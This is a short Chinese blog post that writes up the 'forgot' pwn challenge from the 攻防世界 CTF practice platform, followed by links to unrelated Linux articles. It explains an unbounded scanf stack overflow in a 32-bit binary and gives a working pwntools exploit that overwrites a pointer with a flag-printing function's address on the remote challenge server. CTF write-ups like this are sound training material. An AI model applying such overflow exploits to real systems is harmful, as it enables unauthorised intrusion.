攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
荆楚闲人16 小时前
ubuntu下实现自动以root用户开机无密码方式进入桌面
linux·运维·ubuntu
liweiweili12616 小时前
lsof 查看写入日志文件的进程是什么
linux
Insist75316 小时前
Kingbase--单机部署完整流程
运维·数据库
zuoerjinshu16 小时前
Nginx实现接口复制
运维·nginx·junit
陈皮糖..16 小时前
Ansible实战教程----使用Ansible角色源码编译部署nginx服务
linux·运维·nginx·自动化·云计算·ansible
wifi chicken16 小时前
Linux wlan 周期性维护终端管理框架详解
linux·kernel·协议栈·wifi驱动
惊岁晚16 小时前
【WSL】anaconda安装配置
linux·运维·服务器
奋斗的蛋黄16 小时前
Docker 核心知识点
运维·docker·容器
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04OpenClaw Control UI安全上下文访问配置05UV安装并设置国内源06本地部署 OpenClaw + DeepSeek-R1 完全指南07OpenClaw macOS 完整安装与本地模型配置教程(实战版)08Openclow安装保姆级教程09在 Windows 上配置 Claude Code从安装到解决网络问题10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services